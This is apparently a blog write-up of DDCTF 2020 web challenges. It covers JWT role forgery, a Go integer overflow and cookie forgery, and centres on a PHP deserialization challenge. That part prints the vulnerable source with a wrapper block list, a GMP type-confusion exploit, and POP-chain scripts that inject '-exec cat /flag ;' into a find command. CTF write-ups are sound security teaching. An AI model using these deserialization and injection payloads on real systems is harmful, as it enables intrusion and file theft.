难哭了!😭

web

Web签到题

传下参,很明显是JWT

userRole改成ADMIN,密钥设置成admin成功得到客户端,后来才知道这个密码好像和用户名一样

接着就不会了

卡片商店

go语言整数溢出漏洞,直接向朋友借1844674407370955161个发现

很明显发生了溢出,然后把借的还了兑换礼物就能得到

1
url: /flag , SecKey: Udc13VD5adM_c10nPxFu@v12

访问提示不是幸运玩家,找到伪造cookie:https://github.com/EddieIvan01/secure-cookie-faker

Overwrite Me

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
<?php
error_reporting(0);
class MyClass
{
    var $kw0ng;
    var $flag;

    public function __wakeup()
    {
        $this->kw0ng = 1;
    }

    public function get_flag()
    {
        return system('find /FlagNeverFall ' . escapeshellcmd($this->flag));
    }
}

class Prompter
{   
    protected  $hint;
    public function execute($value)
    {
        include($value);
    }

    public function __invoke()
    {
        if(preg_match("/gopher|http|file|ftp|https|dict|zlib|zip|bzip2|data|glob|phar|ssh2|rar|ogg|expect|\.\.|\.\//i", $this->hint))
        {
            die("Don't Do That!");
        }
        $this->execute($this->hint);
    }
}

class Display
{
    public $contents;
    public $page;
    public function __construct($file='/hint/hint.php')
    {
        $this->contents = $file;
        echo "Welcome to DDCTF 2020, Have fun!<br/><br/>";
    }
    public function __toString()
    {
        return $this->contents();
    }

    public function __wakeup()
    {
        $this->page->contents = "POP me! I can give you some hints!";
        unset($this->page->cont);
    }
}

class Repeater
{
    private $cont;
    public $content;
    public function __construct()
    {
        $this->content = array();
    }

    public function __unset($key)
    {
        $func = $this->content;
        return $func();
    }
}

class Info
{
    function __construct()
    {
        eval('phpinfo();');
    }

}

$show = new Display();
$bullet = $_GET['bullet'];

if(!isset($bullet))
{
    highlight_file(__FILE__);
    die("Give Me Something!");
}else if($bullet == 'phpinfo')
{
    $infos = new Info();
}else
{
    $obstacle = new stdClass;
    $mc = new MyClass();
    $mc->flag = "MyClass's flag said, Overwrite Me If You Can!";
    @unserialize($bullet);
    echo $mc->get_flag();
}

访问/hint/hint.php提示和GMP扩展相关,搜了搜发现是GMP扩展反序列化类型混淆漏洞:https://hackerone.com/reports/198734

测试去除$obstacle = new stdClass;可以替换参数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<?php
class MyClass
{
    var $kw0ng;
    var $flag;

    public function __wakeup()
    {
        $this->kw0ng = 1;
    }

    public function get_flag()
    {
        echo $this->flag."\n";
    }
}
// $obstacle = new stdClass;
$mc = new MyClass();
$mc->flag = "id";
$inner = 's:1:"1";a:2:{s:4:"flag";s:6:"whoami";i:0;O:7:"MyClass":1:{s:5:"kw0ng";R:2;}}';
$exp = 'a:1:{i:0;C:3:"GMP":'.strlen($inner).':{'.$inner.'}}';
// echo urlencode($exp);
@unserialize($exp);
$mc->get_flag();
// var_dump($obstacle);

构造POP链:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
<?php
error_reporting(0);

class Prompter
{   
    protected  $hint;
    public function __construct()
    {
        $this->hint = 'EOf9uk3nSsVFK1LQ.php';
    }
}

class Display
{
    public $contents;
    public $page;
    public function __construct()
    {
        $this->page = new Repeater();
    }
}

class Repeater
{
    private $cont;
    public $content;
    public function __construct()
    {
        $this->content = new Prompter();
    }
}
$a = new Display();
$b=serialize($a);
echo urlencode($b);

可以文件包含,但从phpinfo有open_basedir限制,向页面POST上传文件无响应

后来才知道,原来是可以任意类的任意函数执行的,漏洞点就在于:

1
2
3
4
5
public function __unset($key)
{
    $func = $this->content;
    return $func();
}

$func()那里,如果可控的话,可以任意类中的方法调用的,看一个例子:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
error_reporting(0);
class T
{   
    public function test()
    {
        echo 456;
    }
    public function test1($a){
        echo $a;
    }
}

$a = array(new T,'test');
$a();

$b = array('t','Test');
$b();

$c = array('t','test1');
$c('456');

// 上面三个例子均会输出456

由此,pop链可以为:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
<?php
error_reporting(0);

class MyClass
{
    var $kw0ng;
    var $flag;
    public function __construct(){
        $this->flag = '-exec cat /flag ;';
    }
    public function __wakeup()
    {
        $this->kw0ng = 1;
    }

}

class Display
{
    public $contents;
    public $page;
    public function __construct()
    {
        $this->page = new Repeater();
    }
}

class Repeater
{
    private $cont;
    public $content;
    public function __construct()
    {
        $this->content = array(new MyClass(),'get_flag');
    }
}
$a = new Display();
$b=serialize($a);
echo urlencode($b);

本文永久链接是:http://www.moonback.xyz/2020/09/06/DDCTF2020-writeup/

评论